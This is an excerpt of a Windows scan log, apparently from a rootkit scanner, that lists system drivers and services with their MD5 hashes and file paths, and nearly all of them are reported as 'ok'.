13:26:50.0163 5964	Filetrace (0ae429a696aecbc5970e3cf2c62635ae) C:\Windows\system32\drivers\filetrace.sys
13:26:50.0163 5964	Filetrace - ok
13:26:50.0179 5964	flpydisk (6603957eff5ec62d25075ea8ac27de68) C:\Windows\system32\DRIVERS\flpydisk.sys
13:26:50.0179 5964	flpydisk - ok
13:26:50.0241 5964	FltMgr (01334f9ea68e6877c4ef05d3ea8abb05) C:\Windows\system32\drivers\fltmgr.sys
13:26:50.0241 5964	FltMgr - ok
13:26:50.0897 5964	FontCache (8ce364388c8eca59b14b539179276d44) C:\Windows\system32\FntCache.dll
13:26:50.0928 5964	FontCache - ok
13:26:51.0193 5964	FontCache3.0.0.0 (c7fbdd1ed42f82bfa35167a5c9803ea3) C:\Windows\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe
13:26:51.0209 5964	FontCache3.0.0.0 - ok
13:26:51.0240 5964	Fs_Rec (b972a66758577e0bfd1de0f91aaa27b5) C:\Windows\system32\drivers\Fs_Rec.sys
13:26:51.0240 5964	Fs_Rec - ok
13:26:51.0271 5964	gagp30kx (4e1cd0a45c50a8882616cae5bf82f3c5) C:\Windows\system32\drivers\gagp30kx.sys
13:26:51.0287 5964	gagp30kx - ok
13:26:51.0349 5964	GEARAspiWDM (8182ff89c65e4d38b2de4bb0fb18564e) C:\Windows\system32\Drivers\GEARAspiWDM.sys
13:26:51.0349 5964	GEARAspiWDM - ok
13:26:51.0583 5964	Giraffic - ok
13:26:51.0911 5964	gpsvc (cd5d0aeee35dfd4e986a5aa1500a6e66) C:\Windows\System32\gpsvc.dll
13:26:51.0957 5964	gpsvc - ok
13:26:52.0207 5964	gusvc (751c1d2ca2abf4a9f5a6b8d7d45b907c) C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
13:26:52.0238 5964	gusvc - ok
13:26:52.0301 5964	HdAudAddService (cb04c744be0a61b1d648faed182c3b59) C:\Windows\system32\drivers\HdAudio.sys
13:26:52.0301 5964	HdAudAddService - ok
13:26:52.0613 5964	HDAudBus (062452b7ffd68c8c042a6261fe8dff4a) C:\Windows\system32\DRIVERS\HDAudBus.sys
13:26:52.0628 5964	HDAudBus - ok
13:26:52.0659 5964	HidBth (1338520e78d90154ed6be8f84de5fceb) C:\Windows\system32\drivers\hidbth.sys
13:26:52.0659 5964	HidBth - ok
13:26:52.0691 5964	HidIr (ff3160c3a2445128c5a6d9b076da519e) C:\Windows\system32\drivers\hidir.sys
13:26:52.0691 5964	HidIr - ok
13:26:52.0800 5964	hidserv (84067081f3318162797385e11a8f0582) C:\Windows\System32\hidserv.dll
13:26:52.0815 5964	hidserv - ok
13:26:52.0878 5964	HidUsb (cca4b519b17e23a00b826c55716809cc) C:\Windows\system32\DRIVERS\hidusb.sys
13:26:52.0893 5964	HidUsb - ok
13:26:52.0940 5964	hkmsvc (d8ad255b37da92434c26e4876db7d418) C:\Windows\system32\kmsvc.dll
13:26:52.0987 5964	hkmsvc - ok
13:26:53.0034 5964	HpCISSs (df353b401001246853763c4b7aaa6f50) C:\Windows\system32\drivers\hpcisss.sys
13:26:53.0034 5964	HpCISSs - ok
13:26:53.0611 5964	HTTP (f870aa3e254628ebeafe754108d664de) C:\Windows\system32\drivers\HTTP.sys
13:26:53.0673 5964	HTTP - ok
13:26:53.0736 5964	i2omp (324c2152ff2c61abae92d09f3cca4d63) C:\Windows\system32\drivers\i2omp.sys
13:26:53.0736 5964	i2omp - ok
13:26:53.0876 5964	i8042prt (22d56c8184586b7a1f6fa60be5f5a2bd) C:\Windows\system32\DRIVERS\i8042prt.sys
13:26:53.0892 5964	i8042prt - ok
13:26:53.0923 5964	iaStorV (c957bf4b5d80b46c5017bf0101e6c906) C:\Windows\system32\drivers\iastorv.sys
13:26:53.0923 5964	iaStorV - ok
13:26:54.0297 5964	IDriverT (6f95324909b502e2651442c1548ab12f) C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
13:26:54.0313 5964	IDriverT - ok
13:26:54.0672 5964	idsvc (98477b08e61945f974ed9fdc4cb6bdab) C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
13:26:54.0703 5964	idsvc - ok
13:26:55.0249 5964	iirsp (2d077bf86e843f901d8db709c95b49a5) C:\Windows\system32\drivers\iirsp.sys
13:26:55.0249 5964	iirsp - ok
13:26:55.0623 5964	IKEEXT (9908d8a397b76cd8d31d0d383c5773c9) C:\Windows\System32\ikeext.dll
13:26:55.0655 5964	IKEEXT - ok
13:26:55.0982 5964	IntcAzAudAddService (7bd4e0428776d11c8e8e26f9f5508690) C:\Windows\system32\drivers\RTKVHDA.sys
13:26:56.0045 5964	IntcAzAudAddService - ok
13:26:56.0856 5964	intelide (97469037714070e45194ed318d636401) C:\Windows\system32\drivers\intelide.sys
13:26:56.0856 5964	intelide - ok
13:26:56.0887 5964	intelppm (ce44cc04262f28216dd4341e9e36a16f) C:\Windows\system32\DRIVERS\intelppm.sys
13:26:56.0887 5964	intelppm - ok
13:26:56.0949 5964	IPBusEnum (9ac218c6e6105477484c6fdbe7d409a4) C:\Windows\system32\ipbusenum.dll
13:26:56.0949 5964	IPBusEnum - ok
13:26:56.0996 5964	IpFilterDriver (62c265c38769b864cb25b4bcf62df6c3) C:\Windows\system32\DRIVERS\ipfltdrv.sys
13:26:56.0996 5964	IpFilterDriver - ok
13:26:57.0105 5964	iphlpsvc (1998bd97f950680bb55f55a7244679c2) C:\Windows\System32\iphlpsvc.dll
13:26:57.0121 5964	iphlpsvc - ok
13:26:57.0121 5964	IpInIp - ok
13:26:57.0168 5964	IPMIDRV (40f34f8aba2a015d780e4b09138b6c17) C:\Windows\system32\drivers\ipmidrv.sys
13:26:57.0168 5964	IPMIDRV - ok
13:26:57.0261 5964	IPNAT (8793643a67b42cec66490b2a0cf92d68) C:\Windows\system32\DRIVERS\ipnat.sys
13:26:57.0277 5964	IPNAT - ok
13:26:57.0683 5964	iPod Service (57edb35ea2feca88f8b17c0c095c9a56) C:\Program Files\iPod\bin\iPodService.exe
13:26:57.0729 5964	iPod Service - ok
13:26:57.0761 5964	IRENUM (109c0dfb82c3632fbd11949b73aeeac9) C:\Windows\system32\drivers\irenum.sys
13:26:57.0761 5964	IRENUM - ok
13:26:57.0807 5964	isapnp (350fca7e73cf65bcef43fae1e4e91293) C:\Windows\system32\drivers\isapnp.sys
13:26:57.0839 5964	isapnp - ok
13:26:57.0917 5964	iScsiPrt (232fa340531d940aac623b121a595034) C:\Windows\system32\DRIVERS\msiscsi.sys
13:26:57.0917 5964	iScsiPrt - ok
13:26:57.0948 5964	iteatapi (bced60d16156e428f8df8cf27b0df150) C:\Windows\system32\drivers\iteatapi.sys
13:26:57.0948 5964	iteatapi - ok
13:26:57.0963 5964	iteraid (06fa654504a498c30adca8bec4e87e7e) C:\Windows\system32\drivers\iteraid.sys
13:26:57.0963 5964	iteraid - ok
13:26:58.0041 5964	kbdclass (37605e0a8cf00cbba538e753e4344c6e) C:\Windows\system32\DRIVERS\kbdclass.sys
13:26:58.0041 5964	kbdclass - ok
13:26:58.0151 5964	kbdhid (ede59ec70e25c24581add1fbec7325f7) C:\Windows\system32\DRIVERS\kbdhid.sys
13:26:58.0151 5964	kbdhid - ok
13:26:58.0197 5964	KeyIso (a3e186b4b935905b829219502557314e) C:\Windows\system32\lsass.exe
13:26:58.0197 5964	KeyIso - ok
13:26:58.0244 5964	KR10I (1e0d65f7ffeb4e99b2eec1ccb5754cc8) C:\Windows\system32\drivers\kr10i.sys
13:26:58.0322 5964	KR10I - ok
13:26:58.0603 5964	KR10N (a1963360e74931222a67356c8ad48378) C:\Windows\system32\drivers\kr10n.sys
13:26:58.0712 5964	KR10N - ok
13:26:58.0759 5964	KR3NPXP (485e005cd51ff502fb16483eb4b69c17) C:\Windows\system32\drivers\kr3npxp.sys
13:26:58.0931 5964	KR3NPXP - ok
13:26:59.0009 5964	KSecDD (2b2f1638466e8cb091400c9019cc730e) C:\Windows\system32\Drivers\ksecdd.sys
13:26:59.0040 5964	KSecDD - ok
13:26:59.0492 5964	KtmRm (8078f8f8f7a79e2e6b494523a828c585) C:\Windows\system32\msdtckrm.dll
13:26:59.0570 5964	KtmRm - ok
13:26:59.0664 5964	LanmanServer (1bf5eebfd518dd7298434d8c862f825d) C:\Windows\System32\srvsvc.dll
13:26:59.0664 5964	LanmanServer - ok
13:26:59.0820 5964	LanmanWorkstation (1db69705b695b987082c8baec0c6b34f) C:\Windows\System32\wkssvc.dll
13:26:59.0835 5964	LanmanWorkstation - ok
13:26:59.0976 5964	lltdio (d1c5883087a0c3f1344d9d55a44901f6) C:\Windows\system32\DRIVERS\lltdio.sys
13:26:59.0991 5964	lltdio - ok
13:27:00.0085 5964	lltdsvc (2d5a428872f1442631d0959a34abff63) C:\Windows\System32\lltdsvc.dll
13:27:00.0085 5964	lltdsvc - ok
13:27:00.0147 5964	lmhosts (35d40113e4a5b961b6ce5c5857702518) C:\Windows\System32\lmhsvc.dll
13:27:00.0163 5964	lmhosts - ok
13:27:00.0194 5964	LPCFilter (515fc18cabee0158a324b08b1c2667cf) C:\Windows\system32\DRIVERS\LPCFilter.sys
13:27:00.0194 5964	LPCFilter - ok
13:27:00.0257 5964	LSI_FC (a2262fb9f28935e862b4db46438c80d2) C:\Windows\system32\drivers\lsi_fc.sys
13:27:00.0257 5964	LSI_FC - ok
13:27:00.0288 5964	LSI_SAS (30d73327d390f72a62f32c103daf1d6d) C:\Windows\system32\drivers\lsi_sas.sys
13:27:00.0288 5964	LSI_SAS - ok
13:27:00.0335 5964	LSI_SCSI (e1e36fefd45849a95f1ab81de0159fe3) C:\Windows\system32\drivers\lsi_scsi.sys
13:27:00.0350 5964	LSI_SCSI - ok
13:27:00.0491 5964	luafv (8f5c7426567798e62a3b3614965d62cc) C:\Windows\system32\drivers\luafv.sys
13:27:00.0522 5964	luafv - ok
13:27:00.0709 5964	McAfee SiteAdvisor Service (6c3d154fff0a97a6c3d9f78d60c41655) c:\PROGRA~1\mcafee\SITEAD~1\mcsacore.exe
13:27:00.0725 5964	McAfee SiteAdvisor Service - ok
13:27:00.0771 5964	Mcx2Svc (aef9babb8a506bc4ce0451a64aaded46) C:\Windows\system32\Mcx2Svc.dll
13:27:00.0771 5964	Mcx2Svc - ok
13:27:01.0037 5964	MDM (11f714f85530a2bd134074dc30e99fca) C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
13:27:01.0068 5964	MDM - ok
13:27:01.0146 5964	megasas (d153b14fc6598eae8422a2037553adce) C:\Windows\system32\drivers\megasas.sys
13:27:01.0161 5964	megasas - ok
13:27:01.0255 5964	MMCSS (1076ffcffaae8385fd62dfcb25ac4708) C:\Windows\system32\mmcss.dll
13:27:01.0271 5964	MMCSS - ok
13:27:01.0333 5964	Modem (e13b5ea0f51ba5b1512ec671393d09ba) C:\Windows\system32\drivers\modem.sys
13:27:01.0333 5964	Modem - ok
13:27:01.0427 5964	monitor (0a9bb33b56e294f686abb7c1e4e2d8a8) C:\Windows\system32\DRIVERS\monitor.sys
13:27:01.0427 5964	monitor - ok
13:27:01.0489 5964	mouclass (5bf6a1326a335c5298477754a506d263) C:\Windows\system32\DRIVERS\mouclass.sys
13:27:01.0489 5964	mouclass - ok
13:27:01.0520 5964	mouhid (93b8d4869e12cfbe663915502900876f) C:\Windows\system32\DRIVERS\mouhid.sys
13:27:01.0520 5964	mouhid - ok
13:27:01.0583 5964	MountMgr (bdafc88aa6b92f7842416ea6a48e1600) C:\Windows\system32\drivers\mountmgr.sys
13:27:01.0583 5964	MountMgr - ok
13:27:01.0692 5964	MpFilter (d993bea500e7382dc4e760bf4f35efcb) C:\Windows\system32\DRIVERS\MpFilter.sys
13:27:01.0692 5964	MpFilter - ok
13:27:01.0754 5964	mpio (583a41f26278d9e0ea548163d6139397) C:\Windows\system32\drivers\mpio.sys
13:27:01.0754 5964	mpio - ok
13:27:01.0785 5964	mpsdrv (22241feba9b2defa669c8cb0a8dd7d2e) C:\Windows\system32\drivers\mpsdrv.sys
13:27:01.0801 5964	mpsdrv - ok
13:27:02.0035 5964	MpsSvc (5de62c6e9108f14f6794060a9bdecaec) C:\Windows\system32\mpssvc.dll
13:27:02.0051 5964	MpsSvc - ok
13:27:02.0082 5964	Mraid35x (4fbbb70d30fd20ec51f80061703b001e) C:\Windows\system32\drivers\mraid35x.sys
13:27:02.0082 5964	Mraid35x - ok
13:27:02.0207 5964	MRxDAV (82cea0395524aacfeb58ba1448e8325c) C:\Windows\system32\drivers\mrxdav.sys
13:27:02.0222 5964	MRxDAV - ok
13:27:02.0316 5964	mrxsmb (1e94971c4b446ab2290deb71d01cf0c2) C:\Windows\system32\DRIVERS\mrxsmb.sys
13:27:02.0316 5964	mrxsmb - ok
13:27:02.0378 5964	mrxsmb10 (4fccb34d793b116423209c0f8b7a3b03) C:\Windows\system32\DRIVERS\mrxsmb10.sys
13:27:02.0394 5964	mrxsmb10 - ok
13:27:02.0425 5964	mrxsmb20 (c3cb1b40ad4a0124d617a1199b0b9d7c) C:\Windows\system32\DRIVERS\mrxsmb20.sys
13:27:02.0425 5964	mrxsmb20 - ok
13:27:02.0472 5964	msahci (742aed7939e734c36b7e8d6228ce26b7) C:\Windows\system32\drivers\msahci.sys
13:27:02.0472 5964	msahci - ok
13:27:02.0534 5964	msdsm (3fc82a2ae4cc149165a94699183d3028) C:\Windows\system32\drivers\msdsm.sys
13:27:02.0534 5964	msdsm - ok
13:27:02.0612 5964	MSDTC (fd7520cc3a80c5fc8c48852bb24c6ded) C:\Windows\System32\msdtc.exe
13:27:02.0612 5964	MSDTC - ok
13:27:02.0675 5964	Msfs (a9927f4a46b816c92f461acb90cf8515) C:\Windows\system32\drivers\Msfs.sys
13:27:02.0675 5964	Msfs - ok
13:27:02.0737 5964	msisadrv (0f400e306f385c56317357d6dea56f62) C:\Windows\system32\drivers\msisadrv.sys
13:27:02.0753 5964	msisadrv - ok
13:27:02.0924 5964	MSiSCSI (85466c0757a23d9a9aecdc0755203cb2) C:\Windows\system32\iscsiexe.dll
13:27:02.0924 5964	MSiSCSI - ok
13:27:02.0924 5964	msiserver - ok
13:27:02.0971 5964	MSKSSRV (d8c63d34d9c9e56c059e24ec7185cc07) C:\Windows\system32\drivers\MSKSSRV.sys
13:27:02.0971 5964	MSKSSRV - ok
13:27:03.0080 5964	MsMpSvc (24516bf4e12a46cb67302e2cdcb8cddf) c:\Program Files\Microsoft Security Client\MsMpEng.exe
13:27:03.0080 5964	MsMpSvc - ok
13:27:03.0096 5964	MSPCLOCK (1d373c90d62ddb641d50e55b9e78d65e) C:\Windows\system32\drivers\MSPCLOCK.sys
13:27:03.0096 5964	MSPCLOCK - ok
13:27:03.0143 5964	MSPQM (b572da05bf4e098d4bba3a4734fb505b) C:\Windows\system32\drivers\MSPQM.sys
13:27:03.0143 5964	MSPQM - ok
13:27:03.0189 5964	MsRPC (b49456d70555de905c311bcda6ec6adb) C:\Windows\system32\drivers\MsRPC.sys
13:27:03.0189 5964	MsRPC - ok
13:27:03.0299 5964	mssmbios (e384487cb84be41d09711c30ca79646c) C:\Windows\system32\DRIVERS\mssmbios.sys
13:27:03.0299 5964	mssmbios - ok
13:27:03.0345 5964	MSTEE (7199c1eec1e4993caf96b8c0a26bd58a) C:\Windows\system32\drivers\MSTEE.sys
13:27:03.0345 5964	MSTEE - ok
13:27:03.0595 5964	Mup (6a57b5733d4cb702c8ea4542e836b96c) C:\Windows\system32\Drivers\mup.sys
13:27:03.0611 5964	Mup - ok
13:27:03.0673 5964	napagent (e4eaf0c5c1b41b5c83386cf212ca9584) C:\Windows\system32\qagentRT.dll
13:27:03.0689 5964	napagent - ok
13:27:03.0751 5964	NativeWifiP (85c44fdff9cf7e72a40dcb7ec06a4416) C:\Windows\system32\DRIVERS\nwifi.sys
13:27:03.0751 5964	NativeWifiP - ok
13:27:03.0813 5964	NCHSSVAD (0df9cc7b5cc173f545723f23e68fac93) C:\Windows\system32\drivers\nchssvad.sys
13:27:03.0845 5964	NCHSSVAD - ok
13:27:04.0172 5964	NDIS (1357274d1883f68300aeadd15d7bbb42) C:\Windows\system32\drivers\ndis.sys
13:27:04.0172 5964	NDIS - ok
13:27:04.0219 5964	NdisTapi (0e186e90404980569fb449ba7519ae61) C:\Windows\system32\DRIVERS\ndistapi.sys
13:27:04.0219 5964	NdisTapi - ok
13:27:04.0266 5964	Ndisuio (d6973aa34c4d5d76c0430b181c3cd389) C:\Windows\system32\DRIVERS\ndisuio.sys
13:27:04.0266 5964	Ndisuio - ok
13:27:04.0547 5964	NdisWan (818f648618ae34f729fdb47ec68345c3) C:\Windows\system32\DRIVERS\ndiswan.sys
13:27:04.0547 5964	NdisWan - ok
13:27:04.0609 5964	NDProxy (71dab552b41936358f3b541ae5997fb3) C:\Windows\system32\drivers\NDProxy.sys
13:27:04.0625 5964	NDProxy - ok
13:27:04.0640 5964	NetBIOS (bcd093a5a6777cf626434568dc7dba78) C:\Windows\system32\DRIVERS\netbios.sys
13:27:04.0656 5964	NetBIOS - ok
13:27:04.0703 5964	netbt (ecd64230a59cbd93c85f1cd1cab9f3f6) C:\Windows\system32\DRIVERS\netbt.sys
13:27:04.0703 5964	netbt - ok
13:27:04.0749 5964	Netlogon (a3e186b4b935905b829219502557314e) C:\Windows\system32\lsass.exe
13:27:04.0765 5964	Netlogon - ok
13:27:04.0827 5964	Netman (c8052711daecc48b982434c5116ca401) C:\Windows\System32\netman.dll
13:27:04.0859 5964	Netman - ok
13:27:05.0093 5964	netprofm (2ef3bbe22e5a5acd1428ee387a0d0172) C:\Windows\System32\netprofm.dll
13:27:05.0108 5964	netprofm - ok
13:27:05.0514 5964	NetTcpPortSharing (d6c4e4a39a36029ac0813d476fbd0248) C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
13:27:05.0514 5964	NetTcpPortSharing - ok
13:27:05.0701 5964	nfrd960 (2e7fb731d4790a1bc6270accefacb36e) C:\Windows\system32\drivers\nfrd960.sys
13:27:05.0717 5964	nfrd960 - ok
13:27:05.0763 5964	NisDrv (b52f26bade7d7e4a79706e3fd91834cd) C:\Windows\system32\DRIVERS\NisDrvWFP.sys
13:27:05.0763 5964	NisDrv - ok
13:27:06.0200 5964	NisSrv (290c0d4c4889398797f8df3be00b9698) c:\Program Files\Microsoft Security Client\NisSrv.exe
13:27:06.0200 5964	NisSrv - ok
13:27:06.0497 5964	NlaSvc (2997b15415f9bbe05b5a4c1c85e0c6a2) C:\Windows\System32\nlasvc.dll
13:27:06.0512 5964	NlaSvc - ok
13:27:06.0606 5964	Npfs (d36f239d7cce1931598e8fb90a0dbc26) C:\Windows\system32\drivers\Npfs.sys
13:27:06.0606 5964	Npfs - ok
13:27:06.0653 5964	nsi (8bb86f0c7eea2bded6fe095d0b4ca9bd) C:\Windows\system32\nsisvc.dll
13:27:06.0653 5964	nsi - ok
13:27:06.0684 5964	nsiproxy (609773e344a97410ce4ebf74a8914fcf) C:\Windows\system32\drivers\nsiproxy.sys
13:27:06.0684 5964	nsiproxy - ok
13:27:07.0105 5964	Ntfs (6a4a98cee84cf9e99564510dda4baa47) C:\Windows\system32\drivers\Ntfs.sys
13:27:07.0152 5964	Ntfs - ok
13:27:07.0199 5964	ntrigdigi (e875c093aec0c978a90f30c9e0dfbb72) C:\Windows\system32\drivers\ntrigdigi.sys
13:27:07.0199 5964	ntrigdigi - ok
13:27:07.0230 5964	Null (c5dbbcda07d780bda9b685df333bb41e) C:\Windows\system32\drivers\Null.sys
13:27:07.0230 5964	Null - ok
13:27:07.0261 5964	nvraid (e69e946f80c1c31c53003bfbf50cbb7c) C:\Windows\system32\drivers\nvraid.sys
13:27:07.0277 5964	nvraid - ok
13:27:07.0308 5964	nvstor (9e0ba19a28c498a6d323d065db76dffc) C:\Windows\system32\drivers\nvstor.sys
13:27:07.0308 5964	nvstor - ok
13:27:07.0339 5964	nv_agp (07c186427eb8fcc3d8d7927187f260f7) C:\Windows\system32\drivers\nv_agp.sys
13:27:07.0339 5964	nv_agp - ok
13:27:07.0355 5964	NwlnkFlt - ok
13:27:07.0355 5964	NwlnkFwd - ok
13:27:07.0495 5964	ohci1394 (6f310e890d46e246e0e261a63d9b36b4) C:\Windows\system32\DRIVERS\ohci1394.sys
13:27:07.0495 5964	ohci1394 - ok
13:27:07.0838 5964	p2pimsvc (0c8e8e61ad1eb0b250b846712c917506) C:\Windows\system32\p2psvc.dll
13:27:07.0869 5964	p2pimsvc - ok
13:27:07.0885 5964	p2psvc (0c8e8e61ad1eb0b250b846712c917506) C:\Windows\system32\p2psvc.dll
13:27:07.0885 5964	p2psvc - ok
13:27:08.0041 5964	Parport (0fa9b5055484649d63c303fe404e5f4d) C:\Windows\system32\drivers\parport.sys
13:27:08.0057 5964	Parport - ok
13:27:08.0103 5964	partmgr (b9c2b89f08670e159f7181891e449cd9) C:\Windows\system32\drivers\partmgr.sys
13:27:08.0103 5964	partmgr - ok
13:27:08.0166 5964	Parvdm (4f9a6a8a31413180d0fcb279ad5d8112) C:\Windows\system32\drivers\parvdm.sys
13:27:08.0197 5964	Parvdm - ok
13:27:08.0228 5964	PcaSvc (c6276ad11f4bb49b58aa1ed88537f14a) C:\Windows\System32\pcasvc.dll
13:27:08.0228 5964	PcaSvc - ok
13:27:08.0525 5964	pci (941dc1d19e7e8620f40bbc206981efdb) C:\Windows\system32\drivers\pci.sys
13:27:08.0571 5964	pci - ok
13:27:08.0665 5964	pciide (1636d43f10416aeb483bc6001097b26c) C:\Windows\system32\drivers\pciide.sys
13:27:08.0681 5964	pciide - ok
13:27:08.0712 5964	pcmcia (3bb2244f343b610c29c98035504c9b75) C:\Windows\system32\DRIVERS\pcmcia.sys
13:27:08.0712 5964	pcmcia - ok
13:27:08.0743 5964	pcouffin (5b6c11de7e839c05248ced8825470fef) C:\Windows\system32\Drivers\pcouffin.sys
13:27:08.0743 5964	pcouffin - ok
13:27:09.0008 5964	PEAUTH (6349f6ed9c623b44b52ea3c63c831a92) C:\Windows\system32\drivers\peauth.sys
13:27:09.0055 5964	PEAUTH - ok
13:27:09.0133 5964	pinger (6dbf2ac2bdaff355995ab25eccc4cfe1) C:\Toshiba\IVP\ISM\pinger.exe
13:27:09.0133 5964	pinger - ok
13:27:09.0882 5964	pla (b1689df169143f57053f795390c99db3) C:\Windows\system32\pla.dll
13:27:09.0944 5964	pla - ok
13:27:10.0833 5964	PlugPlay (c5e7f8a996ec0a82d508fd9064a5569e) C:\Windows\system32\umpnpmgr.dll
13:27:10.0849 5964	PlugPlay - ok
13:27:11.0223 5964	PNRPAutoReg (0c8e8e61ad1eb0b250b846712c917506) C:\Windows\system32\p2psvc.dll
13:27:11.0223 5964	PNRPAutoReg - ok
13:27:11.0239 5964	PNRPsvc (0c8e8e61ad1eb0b250b846712c917506) C:\Windows\system32\p2psvc.dll
13:27:11.0255 5964	PNRPsvc - ok
13:27:11.0723 5964	PolicyAgent (d0494460421a03cd5225cca0059aa146) C:\Windows\System32\ipsecsvc.dll
13:27:11.0738 5964	PolicyAgent - ok
13:27:11.0847 5964	PptpMiniport (ecfffaec0c1ecd8dbc77f39070ea1db1) C:\Windows\system32\DRIVERS\raspptp.sys
13:27:11.0847 5964	PptpMiniport - ok
13:27:11.0894 5964	Processor (0e3cef5d28b40cf273281d620c50700a) C:\Windows\system32\drivers\processr.sys
13:27:11.0894 5964	Processor - ok
13:27:11.0957 5964	ProfSvc (0508faa222d28835310b7bfca7a77346) C:\Windows\system32\profsvc.dll
13:27:11.0957 5964	ProfSvc - ok
13:27:12.0035 5964	ProtectedStorage (a3e186b4b935905b829219502557314e) C:\Windows\system32\lsass.exe
13:27:12.0035 5964	ProtectedStorage - ok
13:27:12.0144 5964	PSched (99514faa8df93d34b5589187db3aa0ba) C:\Windows\system32\DRIVERS\pacer.sys
13:27:12.0144 5964	PSched - ok
13:27:12.0237 5964	ql2300 (ccdac889326317792480c0a67156a1ec) C:\Windows\system32\drivers\ql2300.sys
13:27:12.0284 5964	ql2300 - ok
13:27:12.0378 5964	ql40xx (81a7e5c076e59995d54bc1ed3a16e60b) C:\Windows\system32\drivers\ql40xx.sys
13:27:12.0378 5964	ql40xx - ok
13:27:12.0549 5964	QWAVE (e9ecae663f47e6cb43962d18ab18890f) C:\Windows\system32\qwave.dll
13:27:12.0549 5964	QWAVE - ok
13:27:12.0596 5964	QWAVEdrv (9f5e0e1926014d17486901c88eca2db7) C:\Windows\system32\drivers\qwavedrv.sys
13:27:12.0596 5964	QWAVEdrv - ok
13:27:12.0643 5964	RasAcd (147d7f9c556d259924351feb0de606c3) C:\Windows\system32\DRIVERS\rasacd.sys
13:27:12.0659 5964	RasAcd - ok
13:27:12.0705 5964	RasAuto (f6a452eb4ceadbb51c9e0ee6b3ecef0f) C:\Windows\System32\rasauto.dll
13:27:12.0705 5964	RasAuto - ok
13:27:12.0783 5964	Rasl2tp (a214adbaf4cb47dd2728859ef31f26b0) C:\Windows\system32\DRIVERS\rasl2tp.sys
13:27:12.0799 5964	Rasl2tp - ok
13:27:12.0861 5964	RasMan (75d47445d70ca6f9f894b032fbc64fcf) C:\Windows\System32\rasmans.dll
13:27:12.0877 5964	RasMan - ok
13:27:12.0939 5964	RasPppoe (509a98dd18af4375e1fc40bc175f1def) C:\Windows\system32\DRIVERS\raspppoe.sys
13:27:12.0939 5964	RasPppoe - ok
13:27:13.0002 5964	RasSstp (2005f4a1e05fa09389ac85840f0a9e4d) C:\Windows\system32\DRIVERS\rassstp.sys
13:27:13.0017 5964	RasSstp - ok
13:27:13.0142 5964	rdbss (b14c9d5b9add2f84f70570bbbfaa7935) C:\Windows\system32\DRIVERS\rdbss.sys
13:27:13.0142 5964	rdbss - ok
13:27:13.0189 5964	RDPCDD (89e59be9a564262a3fb6c4f4f1cd9899) C:\Windows\system32\DRIVERS\RDPCDD.sys
13:27:13.0189 5964	RDPCDD - ok
13:27:13.0267 5964	rdpdr (e8bd98d46f2ed77132ba927fccb47d8b) C:\Windows\system32\drivers\rdpdr.sys
13:27:13.0267 5964	rdpdr - ok
13:27:13.0283 5964	RDPENCDD (9d91fe5286f748862ecffa05f8a0710c) C:\Windows\system32\drivers\rdpencdd.sys
13:27:13.0283 5964	RDPENCDD - ok
13:27:13.0345 5964	RDPWD (79c6df8477250f5c54f7c5ae1d6b814e) C:\Windows\system32\drivers\RDPWD.sys
13:27:13.0345 5964	RDPWD - ok
13:27:13.0423 5964	RemoteAccess (bcdd6b4804d06b1f7ebf29e53a57ece9) C:\Windows\System32\mprdim.dll
13:27:13.0423 5964	RemoteAccess - ok
13:27:13.0485 5964	RemoteRegistry (9e6894ea18daff37b63e1005f83ae4ab) C:\Windows\system32\regsvc.dll
13:27:13.0485 5964	RemoteRegistry - ok
13:27:13.0532 5964	RpcLocator (5123f83cbc4349d065534eeb6bbdc42b) C:\Windows\system32\locator.exe
13:27:13.0532 5964	RpcLocator - ok
13:27:13.0626 5964	RpcSs (3b5b4d53fec14f7476ca29a20cc31ac9) C:\Windows\system32\rpcss.dll
13:27:13.0626 5964	RpcSs - ok
13:27:13.0688 5964	rspndr (9c508f4074a39e8b4b31d27198146fad) C:\Windows\system32\DRIVERS\rspndr.sys
13:27:13.0688 5964	rspndr - ok
13:27:13.0735 5964	RTL8169 (5163f804256deb8cf1ef64b780a18caa) C:\Windows\system32\DRIVERS\Rtlh86.sys
13:27:13.0735 5964	RTL8169 - ok
13:27:13.0782 5964	SamSs (a3e186b4b935905b829219502557314e) C:\Windows\system32\lsass.exe
13:27:13.0782 5964	SamSs - ok
13:27:13.0829 5964	sbp2port (3ce8f073a557e172b330109436984e30) C:\Windows\system32\drivers\sbp2port.sys
13:27:13.0829 5964	sbp2port - ok
13:27:13.0922 5964	SCardSvr (77b7a11a0c3d78d3386398fbbea1b632) C:\Windows\System32\SCardSvr.dll
13:27:13.0938 5964	SCardSvr - ok
13:27:14.0031 5964	Schedule (1a58069db21d05eb2ab58ee5753ebe8d) C:\Windows\system32\schedsvc.dll
13:27:14.0250 5964	Schedule - ok
13:27:14.0468 5964	SCPolicySvc (312ec3e37a0a1f2006534913e37b4423) C:\Windows\System32\certprop.dll
13:27:14.0484 5964	SCPolicySvc - ok
13:27:14.0624 5964	sdbus (8f36b54688c31eed4580129040c6a3d3) C:\Windows\system32\DRIVERS\sdbus.sys
13:27:14.0640 5964	sdbus - ok
13:27:14.0687 5964	SDRSVC (716313d9f6b0529d03f726d5aaf6f191) C:\Windows\System32\SDRSVC.dll
13:27:14.0687 5964	SDRSVC - ok
13:27:14.0733 5964	secdrv (90a3935d05b494a5a39d37e71f09a677) C:\Windows\system32\drivers\secdrv.sys
13:27:14.0733 5964	secdrv - ok
13:27:14.0780 5964	seclogon (fd5199d4d8a521005e4b5ee7fe00fa9b) C:\Windows\system32\seclogon.dll
13:27:14.0780 5964	seclogon - ok
13:27:14.0811 5964	SENS (a9bbab5759771e523f55563d6cbe140f) C:\Windows\system32\sens.dll
13:27:14.0811 5964	SENS - ok
13:27:14.0827 5964	Serenum (68e44e331d46f0fb38f0863a84cd1a31) C:\Windows\system32\drivers\serenum.sys
13:27:14.0827 5964	Serenum - ok
13:27:14.0858 5964	Serial (c70d69a918b178d3c3b06339b40c2e1b) C:\Windows\system32\drivers\serial.sys
13:27:14.0889 5964	Serial - ok
13:27:14.0936 5964	sermouse (8af3d28a879bf75db53a0ee7a4289624) C:\Windows\system32\drivers\sermouse.sys
13:27:14.0936 5964	sermouse - ok
13:27:15.0233 5964	ServiceLayer (56eb980da71b94b79a341615c3c256cf) C:\Program Files\PC Connectivity Solution\ServiceLayer.exe
